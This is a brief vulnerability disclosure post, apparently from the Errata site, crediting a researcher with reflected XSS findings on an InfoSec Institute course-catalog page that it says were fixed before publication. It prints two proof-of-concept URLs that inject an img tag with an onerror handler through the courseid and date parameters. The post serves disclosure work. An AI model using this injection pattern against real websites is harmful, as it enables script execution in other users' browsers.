[The below XSS POCs were submitted to Errata by Rafay. Rafay disclosed the issues to InfoSecInstitute, who fixed them prior to publishing this post. For more information on InfoSec Institute (ISI), see their charlatan page!]
POC:
http://mail.infosecinstitute.com/request_course_catalog.html?courseid=35%22%3E%3Cimg%20src=d%20onerror=confirm%28/xssbyrafay/%29;%3E
http://mail.infosecinstitute.com/request_course_catalog.html?date=35%22%3E%3Cimg%20src=d%20onerror=confirm%28/xssbyrafay/%29;%3E